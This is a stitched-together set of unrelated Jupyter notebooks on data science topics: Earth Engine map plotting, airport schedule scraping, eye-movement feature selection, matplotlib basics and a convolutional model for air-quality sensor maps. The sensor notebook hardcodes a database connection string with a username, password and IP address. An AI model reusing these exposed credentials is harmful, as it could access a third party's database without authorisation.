a separate .py file # to resolve Runtime errors from ModelCreate import create_model from keras.wrappers.scikit_learn import KerasClassifier # Same epoch and same batch size model = KerasClassifier(build_fn=create_model, epochs=15, batch_size=512, verbose=0) # Construct the pipeline from sklearn.pipeline import Pipeline pipeline = Pipeline([('feature_transformer', vectorizer), ('classifier', model)]) # Fit the pipeline pipeline.fit(data['text'], labels) # Use the pipeline to make inferences le.inverse_transform(pipeline.predict([remove_digits('I had a very bad experience you know.')])) # Ready to serialize/pickle the model from sklearn.externals import joblib # Courtesy: https://bit.ly/2IwQKSS # Save the Keras model first pipeline.named_steps['classifier'].model.save('model/keras_model.h5') # This hack allows us to save the sklearn pipeline pipeline.named_steps['classifier'].model = None # Finally, save the pipeline joblib.dump(pipeline, 'model/sklearn_pipeline.pkl') # Load the pipeline first pipeline = joblib.load('model/sklearn_pipeline.pkl') # Then, load the Keras model from keras.models import load_model from keras.utils import CustomObjectScope from keras.initializers import glorot_uniform with CustomObjectScope({'GlorotUniform': glorot_uniform()}): pipeline.named_steps['classifier'].model = load_model('model/keras_model.h5') # Start making inference le.inverse_transform(pipeline.predict([remove_digits('I had a very bad experience you know.')]))[0] ```
github_jupyter
<a href="https://githubtocolab.com/giswqs/geemap/blob/master/examples/notebooks/51_cartoee_projections.ipynb" target="_parent"><img src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open in Colab"/></a> Uncomment the following line to install [geemap](https://geemap.org) and [cartopy](https://scitools.org.uk/cartopy/docs/latest/installing.html#installing) if needed. Keep in mind that cartopy can be challenging to install. If you are unable to install cartopy on your computer, you can try Google Colab with this the [notebook example](https://colab.research.google.com/github/giswqs/geemap/blob/master/examples/notebooks/cartoee_colab.ipynb). See below the commands to install cartopy and geemap using conda/mamba: ``` conda create -n carto python=3.8 conda activate carto conda install mamba -c conda-forge mamba install cartopy scipy -c conda-forge mamba install geemap -c conda-forge jupyter notebook ``` ``` # !pip install cartopy scipy # !pip install geemap ``` # Working with projections in cartoee `cartoee` is a lightweight module to aid in creatig publication quality maps from Earth Engine processing results without having to download data. The `cartoee` package does this by requesting png images from EE results (which are usually good enough for visualization) and `cartopy` is used to create the plots. Utility functions are available to create plot aethetics such as gridlines or color bars. **The notebook and the geemap cartoee module ([cartoee.py](https://geemap.org/cartoee)) were contributed by [Kel Markert](https://github.com/KMarkert). A huge thank you to him.** ``` import ee import geemap from geemap import cartoee import cartopy.crs as ccrs %pylab inline geemap.ee_initialize() ``` ## Plotting an image on a map Here we are going to show another example of creating a map with EE results. We will use global sea surface temperature data for Jan-Mar 2018. ``` # get an earth engine image of ocean data for Jan-Mar 2018 ocean = ( ee.ImageCollection('NASA/OCEANDATA/MODIS-Terra/L3SMI') .filter(ee.Filter.date('2018-01-01', '2018-03-01')) .median() .select(["sst"], ["SST"]) ) # set parameters for plotting # will plot the Sea Surface Temp with specific range and colormap visualization = {'bands':"SST", 'min':-2, 'max':30} # specify region to focus on bbox = [-180, -88, 180, 88] fig = plt.figure(figsize=(15,10)) # plot the result with cartoee using a PlateCarre projection (default) ax = cartoee.get_map(ocean, cmap='plasma', vis_params=visualization, region=bbox) cb = cartoee.add_colorbar(ax, vis_params=visualization, loc='right', cmap='plasma') ax.set_title(label = 'Sea Surface Temperature', fontsize = 15) ax.coastlines() plt.show() ``` ### Mapping with different projections You can specify what ever projection is available within `cartopy` to display the results from Earth Engine. Here are a couple examples of global and regions maps using the sea surface temperature example. Please refer to the [`cartopy` projection documentation](https://scitools.org.uk/cartopy/docs/latest/crs/projections.html) for more examples with different projections. ``` fig = plt.figure(figsize=(15,10)) # create a new Mollweide projection centered on the Pacific projection = ccrs.Mollweide(central_longitude=-180) # plot the result with cartoee using the Mollweide projection ax = cartoee.get_map(ocean, vis_params=visualization, region=bbox, cmap='plasma', proj=projection) cb = cartoee.add_colorbar(ax,vis_params=visualization, loc='bottom', cmap='plasma', orientation='horizontal') ax.set_title("Mollweide projection") ax.coastlines() plt.show() fig = plt.figure(figsize=(15,10)) # create a new Goode homolosine projection centered on the Pacific projection = ccrs.Robinson(central_longitude=-180) # plot the result with cartoee using the Goode homolosine projection ax = cartoee.get_map(ocean, vis_params=visualization, region=bbox, cmap='plasma', proj=projection) cb = cartoee.add_colorbar(ax, vis_params=visualization, loc='bottom', cmap='plasma', orientation='horizontal') ax.set_title("Robinson projection") ax.coastlines() plt.show() fig = plt.figure(figsize=(15,10)) # create a new Goode homolosine projection centered on the Pacific projection = ccrs.InterruptedGoodeHomolosine(central_longitude=-180) # plot the result with cartoee using the Goode homolosine projection ax = cartoee.get_map(ocean, vis_params=visualization, region=bbox, cmap='plasma', proj=projection) cb = cartoee.add_colorbar(ax, vis_params=visualization, loc='bottom', cmap='plasma', orientation='horizontal') ax.set_title("Goode homolosine projection") ax.coastlines() plt.show() fig = plt.figure(figsize=(15,10)) # create a new orographic projection focused on the Pacific projection = ccrs.EqualEarth(central_longitude=-180) # plot the result with cartoee using the orographic projection ax = cartoee.get_map(ocean, vis_params=visualization, region=bbox, cmap='plasma', proj=projection) cb = cartoee.add_colorbar(ax, vis_params=visualization, loc='right', cmap='plasma', orientation='vertical') ax.set_title("Equal Earth projection") ax.coastlines() plt.show() fig = plt.figure(figsize=(15,10)) # create a new orographic projection focused on the Pacific projection = ccrs.Orthographic(-130,-10) # plot the result with cartoee using the orographic projection ax = cartoee.get_map(ocean, vis_params=visualization, region=bbox, cmap='plasma', proj=projection) cb = cartoee.add_colorbar(ax, vis_params=visualization, loc='right', cmap='plasma', orientation='vertical') ax.set_title("Orographic projection") ax.coastlines() plt.show() ``` ### Warping artifacts Often times global projections are not needed so we use specific projection for the map that provides the best view for the geographic region of interest. When we use these, sometimes image warping effects occur. This is because `cartoee` only requests data for region of interest and when mapping with `cartopy` the pixels get warped to fit the view extent as best as possible. Consider the following example where we want to map SST over the south pole: ``` fig = plt.figure(figsize=(15, 10)) # Create a new region to focus on spole = [-180, -88, 180,0] projection = ccrs.SouthPolarStereo() # plot the result with cartoee focusing on the south pole ax = cartoee.get_map(ocean, cmap='plasma', vis_params=visualization, region=spole, proj=projection) cb = cartoee.add_colorbar(ax, vis_params=visualization, loc='right', cmap='plasma') ax.coastlines() ax.set_title('The South Pole') plt.show() ``` As you can see from the result there are warping effects on the plotted image. There is really no way of getting aound this (other than requesting a larger extent of data which may not always be the case). So, what we can do is set the extent of the map to a more realistic view after plotting the image as in the following example: ``` fig = plt.figure(figsize=(15,10)) # plot the result with cartoee focusing on the south pole ax = cartoee.get_map(ocean, cmap='plasma', vis_params=visualization, region=spole, proj=projection) cb = cartoee.add_colorbar(ax, vis_params=visualization, loc='right', cmap='plasma') ax.coastlines() ax.set_title('The South Pole') # get bounding box coordinates of a zoom area zoom = spole zoom[-1] = -20 # convert bbox coordinate from [W,S,E,N] to [W,E,S,N] as matplotlib expects zoom_extent = cartoee.bbox_to_extent(zoom) # set the extent of the map to the zoom area ax.set_extent(zoom_extent,ccrs.PlateCarree()) plt.show() ```
github_jupyter
``` import pandas as pd, json, numpy as np import matplotlib.pyplot as plt %matplotlib inline ``` Load airports of each country ``` L=json.loads(file('../json/L.json','r').read()) M=json.loads(file('../json/M.json','r').read()) N=json.loads(file('../json/N.json','r').read()) import requests AP={} for c in M: if c not in AP:AP[c]={} for i in range(len(L[c])): AP[c][N[c][i]]=L[c][i] sch={} ``` record schedules for 2 weeks, then augment count with weekly flight numbers. seasonal and seasonal charter will count as once per week for 3 months, so 12/52 per week. TGM separate, since its history is in the past. ``` baseurl='https://www.airportia.com/' import requests, urllib2 SC={} ``` parse Arrivals ``` for c in AP: print c airportialinks=AP[c] sch={} for i in airportialinks: print i, if i not in sch:sch[i]={} #march 4-31 = 4 weeks for d in range (4,32): if d not in sch[i]: try: #capture token url=baseurl+airportialinks[i]+'arrivals/201703'+str(d) s = requests.Session() cookiesopen = s.get(url) cookies=str(s.cookies) fcookies=[[k[:k.find('=')],k[k.find('=')+1:k.find(' for ')]] for k in cookies[cookies.find('Cookie '):].split('Cookie ')[1:]] #push token opener = urllib2.build_opener() for k in fcookies: opener.addheaders.append(('Cookie', k[0]+'='+k[1])) #read html m=s.get(url).content sch[i][url]=pd.read_html(m)[0] except: pass #print 'no tables',i,d print SC[c]=sch ``` parse Departures ``` SD={} for c in AP: print c airportialinks=AP[c] sch={} for i in airportialinks: print i, if i not in sch:sch[i]={} #march 4-31 = 4 weeks for d in range (4,32): if d not in sch[i]: try: #capture token url=baseurl+airportialinks[i]+'departures/201703'+str(d) s = requests.Session() cookiesopen = s.get(url) cookies=str(s.cookies) fcookies=[[k[:k.find('=')],k[k.find('=')+1:k.find(' for ')]] for k in cookies[cookies.find('Cookie '):].split('Cookie ')[1:]] #push token opener = urllib2.build_opener() for k in fcookies: opener.addheaders.append(('Cookie', k[0]+'='+k[1])) #read html m=s.get(url).content sch[i][url]=pd.read_html(m)[0] except: pass #print 'no tables',i,d print SD[c]=sch SC ``` for c in AP: print c airportialinks=AP[c] sch={} for i in airportialinks: print i, if i not in sch:sch[i]={} #march 4-31 = 4 weeks for d in range (4,32): if d not in sch[i]: try: #capture token url=baseurl+airportialinks[i]+'arrivals/201703'+str(d) s = requests.Session() cookiesopen = s.get(url) cookies=str(s.cookies) fcookies=[[k[:k.find('=')],k[k.find('=')+1:k.find(' for ')]] for k in cookies[cookies.find('Cookie '):].split('Cookie ')[1:]] #push token opener = urllib2.build_opener() for k in fcookies: opener.addheaders.append(('Cookie', k[0]+'='+k[1])) #read html m=s.get(url).content sch[i][url]=pd.read_html(m)[0] except: pass #print 'no tables',i,d print SC[c]=sch ``` mdf=pd.DataFrame() for i in sch: for d in sch[i]: df=sch[i][d].drop(sch[i][d].columns[3:],axis=1).drop(sch[i][d].columns[0],axis=1) df['To']=i df['Date']=d mdf=pd.concat([mdf,df]) mdf=mdf.replace('Hahn','Frankfurt') mdf=mdf.replace('Hahn HHN','Frankfurt HHN') mdf['City']=[i[:i.rfind(' ')] for i in mdf['From']] mdf['Airport']=[i[i.rfind(' ')+1:] for i in mdf['From']] file("mdf_ae_arrv.json",'w').write(json.dumps(mdf.reset_index().to_json())) len(mdf) airlines=set(mdf['Airline']) cities=set(mdf['City']) file("cities_ae_arrv.json",'w').write(json.dumps(list(cities))) file("airlines_ae_arrv.json",'w').write(json.dumps(list(airlines))) citycoords={} for i in cities: if i not in citycoords: if i==u'Birmingham': z='Birmingham, UK' elif i==u'Valencia': z='Valencia, Spain' elif i==u'Naples': z='Naples, Italy' elif i==u'St. Petersburg': z='St. Petersburg, Russia' elif i==u'Bristol': z='Bristol, UK' elif i==u'Victoria': z='Victoria, Seychelles' elif i==u'Washington': z='Washington, DC' elif i==u'Odessa': z='Odessa, Ukraine' else: z=i citycoords[i]=Geocoder(apik).geocode(z) print i citysave={} for i in citycoords: citysave[i]={"coords":citycoords[i][0].coordinates, "country":citycoords[i][0].country} file("citysave_ae_arrv.json",'w').write(json.dumps(citysave)) ```
github_jupyter
[![Open In Colab](https://colab.research.google.com/assets/colab-badge.svg)](https://colab.research.google.com/github/giswqs/GEE-Courses/blob/master/docs/gee_intro/Image/image_styling.ipynb) ``` # !pip install geemap import ee import geemap import geemap.colormaps as cm ``` ## Colormap ``` # geemap.update_package() cm.palettes.dem cm.palettes.ndvi cm.palettes.ndwi cm.get_palette('terrain', n_class=8) cm.plot_colormap('terrain', width=8.0, height=0.4, orientation='horizontal') cm.list_colormaps() cm.plot_colormaps(width=12, height=0.4) ``` ## Colorbar ``` Map = geemap.Map() palette = cm.palettes.dem # palette = cm.palettes.terrain dem = ee.Image('USGS/SRTMGL1_003') vis_params = {'min': 0, 'max': 4000, 'palette': palette} Map.addLayer(dem, vis_params, 'SRTM DEM') Map.add_colorbar(vis_params, label="Elevation (m)", layer_name="SRTM DEM") Map Map.add_colorbar( vis_params, label="Elevation (m)", orientation="vertical", layer_name="SRTM DEM" ) Map.add_colorbar( vis_params, label="Elevation (m)", orientation="vertical", layer_name="SRTM DEM", transparent_bg=True, ) Map.add_colorbar( vis_params, discrete=True, label="Elevation (m)", orientation="vertical", layer_name="SRTM DEM", ) ``` ## Legend ``` legends = geemap.builtin_legends for legend in legends: print(legend) Map = geemap.Map(basemap="HYBRID") Map.add_basemap("FWS NWI Wetlands Raster") Map.add_legend(builtin_legend="NWI") Map Map = geemap.Map(basemap="HYBRID") Map.add_basemap("NLCD 2016 CONUS Land Cover") Map.add_legend(builtin_legend="NLCD") Map Map = geemap.Map() legend_dict = { '11 Open Water': '466b9f', '12 Perennial Ice/Snow': 'd1def8', '21 Developed, Open Space': 'dec5c5', '22 Developed, Low Intensity': 'd99282', '23 Developed, Medium Intensity': 'eb0000', '24 Developed High Intensity': 'ab0000', '31 Barren Land (Rock/Sand/Clay)': 'b3ac9f', '41 Deciduous Forest': '68ab5f', '42 Evergreen Forest': '1c5f2c', '43 Mixed Forest': 'b5c58f', '51 Dwarf Scrub': 'af963c', '52 Shrub/Scrub': 'ccb879', '71 Grassland/Herbaceous': 'dfdfc2', '72 Sedge/Herbaceous': 'd1d182', '73 Lichens': 'a3cc51', '74 Moss': '82ba9e', '81 Pasture/Hay': 'dcd939', '82 Cultivated Crops': 'ab6c28', '90 Woody Wetlands': 'b8d9eb', '95 Emergent Herbaceous Wetlands': '6c9fb8', } landcover = ee.Image('USGS/NLCD/NLCD2016').select('landcover') Map.addLayer(landcover, {}, 'NLCD Land Cover') Map.add_legend( title="NLCD Land Cover Classification", legend_dict=legend_dict, layer_name='NLCD Land Cover', ) Map ```
github_jupyter
``` import numpy as np import pandas as pd from sklearn.feature_selection import RFE from sklearn.tree import DecisionTreeClassifier import seaborn as sns import matplotlib.pyplot as plt df = pd.read_csv("eye_movements.csv") num_missing_values = df.isna().sum() num_missing_values # No need to remove any tuples or perform data imputation since none of the data is missing attributes = df.columns attributes num_unique = {} for attribute in attributes: num_unique[attribute] = len(pd.unique(df[attribute])) num_unique df2 = df.drop(columns=['lineNo','titleNo','wordNo'], axis=1) # Contains unique values for each instance, not going to be useful # Also contants index values instead of actual data df2.columns x = df2.drop(columns=['label'], axis=1) y = df2['label'] # get the pearson correlation coefficients for all features to determine which features to train on corr = df2.corr() class_correlation = abs(corr["label"]) relevant_features = class_correlation[class_correlation > 0.1] relevant_features # features should be independent of each other, test to make sure they aren't highly correlated with each other feature_strings = ["P2stFixation", "totalFixDur", "nRegressFrom", "regressDur", "nextWordRegress", "pupilDiamMax", "timePrtctg"] for i in feature_strings: for j in feature_strings: if i != j: print(abs(df[[i,j]].corr())) print() # drop all columns which have a low correlation # regressDur and timePtrctg have a high correlation with several other attributes and are thus not independent, drop both as well final_columns = ["P2stFixation", "totalFixDur", "nRegressFrom", "nextWordRegress", "pupilDiamMax"] df_preprocessed_correlation = df2 for i in df2.columns: if i not in final_columns: df_preprocessed_correlation = df_preprocessed_correlation.drop(columns=[i,], axis=1) df_preprocessed_correlation # perform attribute selection with RFE + decision trees # RFE (Recursive Feature Elimination) feeds the data to a model, evaluates the performance for each attribute # and deletes attributes which don't perform well enough rfe = RFE(estimator=DecisionTreeClassifier(), n_features_to_select=5) fit = rfe.fit(x, y) best_features = [] print(len(fit.support_)) print(len(x.columns)) for i in range(len(fit.support_)): if fit.support_[i]: best_features.append(x.columns[i]) print(best_features) df_preprocessed_rfe = df2 for i in df2.columns: if i not in best_features: df_preprocessed_rfe = df_preprocessed_rfe.drop(columns=[i,], axis=1) df_preprocessed_rfe ```
github_jupyter
``` from matplotlib import pyplot as plt import numpy as np import random as rn import csv import urllib import matplotlib.dates as mdates # Video 1 - Introduction and Line plt.plot([1, 2, 3], [5, 7, 4]) plt.show() # Video 2 - Legends, titles and labels x1 = [1, 2, 3] y1 = [5, 7, 4] x2 = [1, 2, 3] y2 = [10, 14, 12] plt.plot(x1, y1, label = 'First line') plt.plot(x2, y2, label = 'Second line') plt.xlabel('X Axis here') plt.ylabel('Y Axis here') plt.title('Title here!\nSubtitle here!') plt.legend() plt.show() # Video 3 - Barcharts and Histograms # x1 = [2, 4, 6, 8, 10] # y1 = [6, 7, 8, 2, 4] # x2 = [1, 3, 5, 7, 9] # y2 = [7, 8, 2, 4, 2] # plt.bar(x1, y1, label = 'Bars1', color = 'green') # plt.bar(x2, y2, label = 'Bars2', color = 'red') population_ages = [22, 55, 62, 45, 21, 22, 34, 42, 42, 4, 99, 102, 110, 120, 121, 122, 130, 111, 115, 112, 80, 75, 65, 54, 44, 43, 42, 48] # ids = [x for x in range(len(population_ages))] bins = [0, 10, 20, 30, 40, 50, 60, 70, 80, 90, 100, 110, 120, 130] plt.hist(population_ages, bins = bins, histtype = 'bar', rwidth = 0.8, label ='Ages') plt.xlabel('x') plt.ylabel('y') plt.title('Interesting Graph!\ncredits: sentdex') plt.legend() plt.show() # Video 4 - Scatter plots x = [x for x in range(8)] y = [rn.randint(0, 10) for x in range(8)] plt.scatter(x, y, label = 'skitscat', color = 'b', marker = '*', s = 100) plt.xlabel('x') plt.ylabel('y') plt.title('Interesting Graph!\ncredits: sentdex') plt.legend() plt.show() # Video 5 - Pie plots days = [x for x in range(5)] sleeping = [7, 8, 6, 11, 7] eating = [2, 3, 4, 3, 2] playing = [7, 8, 7, 2, 2] coding = [5, 3, 8, 6, 7] slices = [7,2,2,13] activities = ['sleeping','eating','working','playing'] cols = ['c','m','r','b'] plt.pie(slices, labels = activities, colors = cols, startangle = 90, shadow = True, explode = (0, 0.1, 0, 0), autopct = '%1.1f' ) # plt.xlabel('x') # plt.ylabel('y') plt.title('Interesting Graph!\ncredits: sentdex') # plt.legend() plt.show() # Video 6 - Loading data from file # x = [] # y = [] # with open('data.txt', 'r') as csv_file: # plots = csv.reader(csv_file, delimiter = ',') # for row in plots: # x.append(int(row[0])) # y.append(int(row[1])) x, y = np.loadtxt('data.txt', delimiter = ',', unpack = True) plt.plot(x, y, label ='Loaded from file', color = 'g') plt.xlabel('x') plt.ylabel('y') plt.title('Interesting Graph!\ncredits: sentdex') plt.legend() plt.show() # Day 7 - Getting Data from Internet def load_data(): global source_code stock_price_url = 'https://pythonprogramming.net/yahoo_finance_replacement' source_code = urllib.request.urlopen(stock_price_url).read().decode() def graph_data(): stock_data = [] split_sources = source_code.split('\n') for i in range(1, len(split_sources)): stock_data.append(split_sources[i].split(',')) # date, closep, highp, lowp, openp, volume = np.loadtxt(stock_data, delimiter = ',', unpack = True, converters = {0: bytespdate2num('%Y%m%d')}) # plt.xlabel("x") # plt.ylabel("y") # plt.title('Data Visualization Course\nBy sentdex') # plt.legend() # plt.show() graph_data() # Day 8 - Coverting data from Internet def bytespdate2num(fmt, encoding='utf-8'): def bytesconverter(b): s = b.decode(encoding) return (mdates.datestr2num(s)) return bytesconverter def graph_data(stock): stock_price_url = 'https://pythonprogramming.net/yahoo_finance_replacement' source_code = urllib.request.urlopen(stock_price_url).read().decode() stock_data = [] split_source = source_code.split('\n') for line in split_source[1:]: split_line = line.split(',') if len(split_line) == 7: if 'values' not in line and 'labels' not in line: stock_data.append(line) date, closep, highp, lowp, openp, adj_closep, volume = np.loadtxt(stock_data, delimiter = ',', unpack = True, converters = {0: bytespdate2num('%Y-%m-%d')}) plt.plot_date(date, closep, '-', label = 'Price') plt.xlabel('Date') plt.ylabel('Price') plt.title('Interesting Graph\nCheck it out') plt.legend() plt.show() graph_data('TSLA') # Day 9 - Basic Customizations, Rotating labels def bytespdate2num(fmt, encoding='utf-8'): def bytesconverter(b): s = b.decode(encoding) return (mdates.datestr2num(s)) return bytesconverter def graph_data(stock): stock_price_url = 'https://pythonprogramming.net/yahoo_finance_replacement' source_code = urllib.request.urlopen(stock_price_url).read().decode() stock_data = [] split_source = source_code.split('\n') for line in split_source[1:]: split_line = line.split(',') if len(split_line) == 7: if 'values' not in line and 'labels' not in line: stock_data.append(line) date, closep, highp, lowp, openp, adj_closep, volume = np.loadtxt(stock_data, delimiter = ',', unpack = True, converters = {0: bytespdate2num('%Y-%m-%d')}) fig = plt.figure() plt.plot_date(date, closep, '-', label = 'Price') plt.xlabel('Date') plt.ylabel('Price') plt.title('Interesting Graph\nCheck it out') plt.legend() plt.show() graph_data('TSLA') ```
github_jupyter
``` import pandas as pd import numpy as np import pymysql from sqlalchemy import create_engine import matplotlib.pyplot as plt import os.path # set this to True to force download database using SQL, # else {if `datafile` exists, load it. else download from database} download = False datafile = 'data.csv' engine = None %%time if download or not os.path.isfile(datafile): if engine is None: print('Creating database engine...') engine = create_engine('mysql+pymysql://iotr:iotr123@115.88.201.51/kisti') print('Querying database...') df = pd.read_sql_query('SELECT * FROM sensorParser WHERE gateway_id="SERVER"\ AND timestamp IS NOT NULL AND timestamp <> "" ORDER BY timestamp LIMIT 1000000', engine) print('Saving "{}" to disk...'.format(datafile)) df.to_csv(datafile) else: print('Reading from "{}"...'.format(datafile)) df = pd.read_csv(datafile, header=0) df_temp = df df.head() df.info() ``` # Clean data ``` df = df.dropna(axis=0, how='any', subset=['temp_value']) df.shape df = df[df.temp_value > -10] df = df[df.temp_value < 60] df.shape df['timegroup'] = df['timestamp'].apply(lambda x: x.split(':')[0]) df.timegroup.head() df = df.iloc[3:] df.timegroup.head() df = df[df.lat < 36.0] df = df[df.lat > 35.5] df = df[df.lng < 129.0] df = df[df.lng > 128.2] df.shape df = df[df.co_value < 10] df.shape df = df[df.pm2_5_value < 200] df = df[df.pm10_value < 1000] df = df[df.pres_value < 200000] df.shape df.describe() df.columns feature_columns = ['temp_value', 'so2_value', 'no2_value', 'co_value', 'pm2_5_value', 'pm10_value', 'voc_value', 'hum_value', 'pres_value', 'mcp_value'] spatial_columns = ['lat', 'lng'] time_column = 'timegroup' all_columns = spatial_columns + feature_columns + [time_column] df[feature_columns] for col in feature_columns + spatial_columns: plt.figure() plt.title(col) df[col].plot.hist(alpha=0.5, bins=10) plt.show() ``` # Convert lat, long to row, column ``` min_corner, max_corner = df[spatial_columns].min(), df[spatial_columns].max() min_corner max_corner sample_point = df.iloc[0][spatial_columns] sample_point def get_region(x, minx, maxx, total_regions): region = (x - minx) / (maxx - minx) region *= total_regions region = int(region) # force lower bound and upper bound of the region region = max(0, region) region = min(total_regions-1, region) return region get_region(sample_point.lat, min_corner.lat, max_corner.lat, 10) n_rows = 10 n_cols = 10 def get_row(lat, lng, min_corner, max_corner, rows, cols): row = get_region(lat, min_corner.lat, max_corner.lat, rows) row = rows - row - 1 # invert latitude, to make it goes from bottom to top return row def get_col(lat, lng, min_corner, max_corner, rows, cols): col = get_region(lng, min_corner.lng, max_corner.lng, cols) return col def get_rc(lat, lng, min_corner, max_corner, rows, cols): row = get_row(lat, lng, min_corner, max_corner, rows, cols) col = get_col(lat, lng, min_corner, max_corner, rows, cols) return row, col get_rc(sample_point.lat, sample_point.lng, min_corner, max_corner, 10, 10) %%time rows = [] cols = [] for i in range(df.shape[0]): current_record = df.iloc[i] r,c = get_rc(current_record.lat, current_record.lng, min_corner, max_corner, n_rows, n_cols) rows.append(r) cols.append(c) rows[0], cols[0] #example row and col from lat,long df['row'] = rows df['col'] = cols df[['row', 'col']].head() ``` # Generate map stacks ``` ## defining map_stacks as a 4D tensor of shape (n_map_stack, n_rows, n_cols, n_channels) ## ready for feeding into a convolutional neural network grouped = df.groupby('timegroup') feature_columns2 = feature_columns + ['sensing_count', 'sensing_binary'] map_stacks = np.zeros([len(grouped), n_rows, n_cols, len(feature_columns2)]) group_no = 0 for name, group in grouped: slot_grouped = group.groupby(['row', 'col']) map_stack = np.zeros([n_rows, n_cols, len(feature_columns2)]) for name, slot_df in slot_grouped: sensing_count = slot_df.shape[0] sensing_binary = 1 if sensing_count > 0 else 0 map_stack[name[0], name[1], :] = list(slot_df[feature_columns].mean().values) + [sensing_count, sensing_binary] map_stacks[group_no, :, :, :] = map_stack group_no += 1 # print(map_stack[:,:,-1]) # print(map_stack[:,:,0]) # map_stack.shape map_stacks.shape # sensing count for each duration sensing_count = [] for i in range(map_stacks.shape[0]): sensing_count.append(map_stacks[i,:,:,-2].sum()) plt.hist(sensing_count) plt.show() def plot_map_stack(*map_stacks): for channel in range(map_stacks[0].shape[2]): fig, axes = plt.subplots(1, len(map_stacks)) for i in range(len(map_stacks)): ax = axes[i] if isinstance(axes, np.ndarray) else axes ax.imshow(map_stacks[i][:,:,channel], cmap='gray', interpolation='none') ax.set_title(feature_columns2[channel]) ax.grid(color='w', linestyle='-', linewidth=1) ax.set_xticks(np.arange(-0.5, n_cols+.5, 1)) ax.set_yticks(np.arange(-0.5, n_rows+.5, 1)) ax.set_xticklabels(np.arange(0, n_cols+1, 1)) ax.set_yticklabels(np.arange(0, n_rows+1, 1)) plt.show() # plot an example of a stack map map_stack = map_stacks[0, :, :, :] plot_map_stack(map_stack) ``` **Normalize maps** ``` from sklearn.preprocessing import StandardScaler scaler = StandardScaler() map_stacks2d = map_stacks.reshape([-1, map_stacks.shape[-1]]) map_stacks2d_scaled = scaler.fit_transform(map_stacks2d) scaled_map_stacks = map_stacks2d_scaled.reshape(map_stacks.shape) map_stacks2d_scaled.shape, scaled_map_stacks.shape # prepare input, output pairs for the model X = scaled_map_stacks[:-1, ...] y = scaled_map_stacks[1:, ...] # y -= X X.shape, y.shape ``` # Building the model ``` # train test split from sklearn.model_selection import train_test_split X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.15) X_train.shape, X_test.shape from keras.models import Sequential from keras.layers import Dense, Conv2D, Conv2DTranspose from keras.callbacks import EarlyStopping layers = [ # this applies 32 convolution filters of size 3x3 each. Conv2D(32, (3, 3), activation='relu', input_shape=(n_rows, n_cols, map_stacks.shape[-1])), Conv2D(32, (3, 3), activation='relu'), # Conv2D(64, (3, 3), activation='relu'), # Conv2DTranspose(32, (3, 3), activation='relu'), Conv2DTranspose(32, (3, 3), activation='relu'), Conv2DTranspose(map_stacks.shape[-1], (3, 3), activation='linear'), ] model = Sequential(layers) model.compile(loss='mean_squared_error', optimizer='rmsprop') model.summary() # model.add(MaxPooling2D(pool_size=(2, 2))) # model.add(Dropout(0.25)) callbacks = [ EarlyStopping(monitor='val_loss', patience=5, verbose=1) ] history = model.fit(X_train, y_train, epochs=200, verbose=0, validation_split=0.1, batch_size=32, callbacks=callbacks) model.save('model.h5') history.history # # plot weights # weights = model.layers[0].get_weights()[0] # print(weights.shape) # for i in range(32): # plt.imshow(weights[:,:,0,i], cmap='gray', interpolation='none') # plt.show() model.evaluate(X_train, y_train, batch_size=32) model.evaluate(X_test, y_test, batch_size=32) y_dummy = np.random.random(size=y_test.shape) * y_test.std() + y_test.mean() model.evaluate(X_test, y_dummy, batch_size=32) from sklearn.metrics import r2_score r2_train = r2_score(y_train.ravel(), model.predict(X_train).ravel()) r2_test = r2_score(y_test.ravel(), model.predict(X_test).ravel()) r2_dummy = r2_score(y_test.ravel(), y_dummy.ravel()) r2_train, r2_test, r2_dummy # try plotting prediction vs actual output def plot_xy(x, y, idx): y_pred = model.predict(x[idx:idx+1,...]).squeeze() y_true = y[idx,...] plot_map_stack(x[idx,...], y_true, y_pred) # plot train plot_xy(X_train, y_train, 42) plot_xy(X_test, y_test, 42) ``` # Use map stack to predict something useful 0. train a new predictive model on all sensing records, with labels like good/bad, asthma/not-asthma, etc 1. given past sensing map stack, predict successive sensing map stack 2. feed each sensing slot of the successive map stack into the new predictive model 3. use labels predicted on all slots to help assist in making decisions ``` # using heuristic method to generate the label good_mask = np.bitwise_and(df.temp_value > 10, df.temp_value < 50) good_mask = np.bitwise_and(good_mask, df.so2_value > 0) good_mask = np.bitwise_and(good_mask, df.so2_value < 0.02) good_mask = np.bitwise_and(good_mask, df.no2_value < 0.03) good_mask.sum(), df.shape df['label'] = np.array(['Good', 'Bad'])[good_mask] %%time # Train a simple model to predict label given sensing record from sklearn import tree label_model = tree.DecisionTreeClassifier() label_model.fit(df[feature_columns], df['label']) label_model.score(df[feature_columns], df['label']) def predict_label(X, scaler, label_model): X_2d = X.reshape(-1, X.shape[-1]) X_2d_unscaled = scaler.inverse_transform(X_2d) X_2d_no_sensing = X_2d_unscaled[:,:len(feature_columns)] return label_model.predict(X_2d_no_sensing).reshape(X.shape[:3]) X_train_label = predict_label(X_train, scaler, label_model) X_test_label = predict_label(X_test, scaler, label_model) y_train_label = predict_label(y_train, scaler, label_model) y_test_label = predict_label(y_test, scaler, label_model) y_train_pred = model.predict(X_train) y_test_pred = model.predict(X_test) y_train_label_pred = predict_label(y_train_pred, scaler, label_model) y_test_label_pred = predict_label(y_test_pred, scaler, label_model) from collections import Counter Counter(y_train_label.ravel()), Counter(y_train_label_pred.ravel()), Counter(y_test_label.ravel()), Counter(y_test_label_pred.ravel()) # assuming that x is scaled def plot_label_map(X, X_label, y_true, y_label_true, y_pred, y_label_pred, idx): data = [ (X, X_label, 'X'), (y_true, y_label_true, 'y_true'), (y_pred, y_label_pred, 'y_pred') ] fig, axes = plt.subplots(1, len(data)) for i in range(len(data)): ax = axes[i] x, y, title = data[i] y_img = (y[idx,...] == 'Good').astype(np.float32) y_img[x[idx,...,-1] < x[idx,...,-1].mean()] = np.nan ax.imshow(y_img, interpolation='none') ax.set_title(title) ax.grid(color='w', linestyle='-', linewidth=1) ax.set_xticks(np.arange(-0.5, n_cols+.5, 1)) ax.set_yticks(np.arange(-0.5, n_rows+.5, 1)) ax.set_xticklabels(np.arange(0, n_cols+1, 1)) ax.set_yticklabels(np.arange(0, n_rows+1, 1)) plt.show() # train results for idx in [1,2,5,9,42,50,60,150]: plot_label_map(X_train, X_train_label, y_train, y_train_label, y_train_pred, y_train_label_pred, idx) # test results for idx in [1,2,5,9,42,50, 60, 70]: plot_label_map(X_test, X_test_label, y_test, y_test_label, y_test_pred, y_test_label_pred, idx) ```
github_jupyter
